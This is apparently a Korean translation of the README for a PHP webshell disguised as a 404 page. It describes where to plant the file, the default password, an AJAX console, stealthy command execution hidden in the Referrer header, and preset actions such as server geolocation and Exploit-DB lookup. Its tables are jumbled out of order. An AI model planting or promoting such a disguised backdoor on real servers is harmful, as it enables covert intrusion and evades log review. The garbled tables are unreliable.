
404 오류 페이지로 위장한 은밀한 PHP 웹쉘, AJAX 콘솔 포함, Referrer 헤더를 통한 숨겨진 명령 실행, 및 원격 서버 접근을 위한 사전 구성된 작업
프로젝트를 클론하거나 다운로드하세요:
git clone --depth=1 https://github.com/CosasDePuma/SecurityNotFound.git
src/404.php 파일은 대상 서버에 위치해야 하며, .php 파일을 실행할 수 있어야 합니다.
다음은 서버가 위치한 가장 일반적인 경로의 예입니다:
# 🏁 윈도우
C:\Xampp\htdocs\ # Xampp
# 🐧 리눅스
/var/www/html/ # Apache
/usr/share/nginx/html/ # Nginx
👮 물론, 당신과 나는 당신이 해당 서버에 대한 합법적인 접근 권한이 있다는 것을 알고 있습니다.
이제 브라우저를 통해 접근할 수 있습니다:
https://www.example.com/404.php

💡 서버 404 오류 템플릿을 교체하여 유효하지 않은 URL에서도 접근할 수 있습니다.
제어판에 접근하려면 TAB 키를 누르거나 브라우저 도구를 사용하여 비밀번호 필드를 검색하세요:

기본 비밀번호는: cosasdepuma 입니다.
🥚 스크립트의
$passphrase변수를 빈 문자열로 두면 제어판에 직접 접근할 수 있습니다.
🔒 사용자 지정 값을 설정하려면,
MD5알고리즘을 연속 세 번 적용한 후 비밀번호를$passphrase변수에 삽입하세요.
로그인하면 웹쉘이 실제 모습을 보여줍니다:
패널에는 AJAX 콘솔과 여러 사전 구성된 동작이 있습니다:
| 이름 | 설명 |
|---|---|
| PHP 정보 | phpinfo(); 페이지를 표시합니다. |
| 지리적 위치 |
명령 실행은 "Referrer" 헤더를 사용하여 수행되며, 그 내용이 실행되는 페이로드입니다.
이것은 두 가지 장점이 있습니다: 로그 파일 내에서 더 큰 은밀성과 웹 인터페이스에 접근할 필요 없이 명령을 실행할 수 있는 능력입니다.
172.18.0.1 - - [25/Jul/2022:04:52:17 +0000] "GET /404.php HTTP/1.1" 404 771 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:21 +0000] "POST /404.php HTTP/1.1" 404 3560 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:27 +0000] "GET /404.php HTTP/1.1" 404 375 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:31 +0000] "GET /404.php HTTP/1.1" 404 470 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:37 +0000] "GET /404.php?p HTTP/1.1" 404 75790 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:41 +0000] "GET /404.php HTTP/1.1" 404 3560 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:43 +0000] "GET /404.php?c HTTP/1.1" 302 373 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:43 +0000] "GET /404.php HTTP/1.1" 404 771 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
제가 하는 모든 것과 게시한 것은 제가 해당하는 공로를 인정받을 때마다 무료로 사용될 수 있습니다.
어쨌든, 더 직접적인 방법으로 도움을 주고 싶다면, 이 배지를 클릭하여 팁을 남겨주세요:
서버가 물리적으로 위치한 장소를 Google 지도에 표시합니다. |
| Exploit-DB (...) | exploit-db.com에서 호환 가능한 익스플로잇을 검색합니다. |
| 로그아웃 | 대시보드를 종료합니다. |
access.log의 줄 수 | 동작 |
|---|
| 1 | 로그인하지 않은 접근 |
| 1 | 세션이 이미 시작된 상태에서 접근 |
| 1 | 로그인 |
| 2 | 로그아웃 |
| 1 | 콘솔을 통해 명령 실행 |
| 1 | 플러그인: PHP 정보 |
| 0 | 플러그인: 지리적 위치 |
| 0 | 플러그인: Exploit-DB (...) |